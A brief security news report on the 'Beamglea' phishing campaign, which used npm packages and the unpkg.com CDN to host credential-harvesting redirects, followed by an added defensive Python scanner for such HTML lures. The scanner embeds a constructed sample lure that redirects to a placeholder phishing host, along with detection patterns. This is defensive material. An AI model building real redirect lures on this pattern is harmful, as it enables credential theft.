npm Phishing Attack 'Beamglea' Targets 135+ Firms
A widespread phishing campaign, dubbed "Beamglea," has been discovered leveraging 175 malicious npm packages to target over 135 companies globally. These packages, downloaded over 26,000 times, do not execute malicious code upon installation; instead, the attackers use npm and the unpkg.com CDN to host redirect scripts. Attackers distribute HTML lures, likely via email, which, when opened, run a script that sends victims to a credential harvesting page. The script pre-fills the victim's email address on the phishing page, which makes the page look more legitimate and raises the attack's success rate. This automated campaign highlights a novel abuse of legitimate open-source infrastructure for resilient and low-cost phishing operations.
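The lure described above (an HTML attachment that loads a redirect script from unpkg.com and carries the victim's email) can be triaged from the defender's side. The scanner below is an added example, not code from the report or from the campaign; the sample HTML is constructed, the package name in it is a placeholder, and the assumption that the email appears inside the script or its target URL is mine, not a detail the report states.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of the kind of HTML lure the report describes: a near-empty
# page whose only job is to pull a script from the npm CDN and redirect.
SAMPLE_LURE = """<html><body>
<script src="https://unpkg.com/placeholder-pkg@1.0.0/redirect.js"></script>
<script>window.location.href = "https://phish.example/login#victim@example.com";</script>
</body></html>"""

CDN_HOSTS = {"unpkg.com"}  # npm CDN named in the report; extend with others you watch
REDIRECT_RE = re.compile(r"(window\.|document\.)?location(\.href|\.replace|\.assign)?\s*(=|\()", re.I)
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


class LureScanner(HTMLParser):
    """Collect external script sources and inline script bodies from an HTML document."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.inline_scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.script_srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_scripts.append(data)


def scan_html_lure(html):
    """Return findings explaining why the HTML resembles a CDN-backed redirect lure."""
    parser = LureScanner()
    parser.feed(html)
    findings = []
    for src in parser.script_srcs:
        if (urlparse(src).hostname or "").lower() in CDN_HOSTS:
            findings.append(f"external script loaded from npm CDN: {src}")
    for body in parser.inline_scripts:
        if REDIRECT_RE.search(body):
            findings.append("inline script performs a location redirect")
        for email in EMAIL_RE.findall(body):
            findings.append(f"email address embedded in script: {email}")
    return findings


def is_suspicious(html):
    """Two or more independent indicators is the (assumed) triage threshold."""
    return len(scan_html_lure(html)) >= 2
```

Run it over HTML attachments from a mail gateway quarantine; a hit on the CDN-host check alone is worth a look, since a legitimate HTML email rarely pulls scripts from unpkg.com at all.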
Latest mentioned: 10-10
Earliest mentioned: 10-10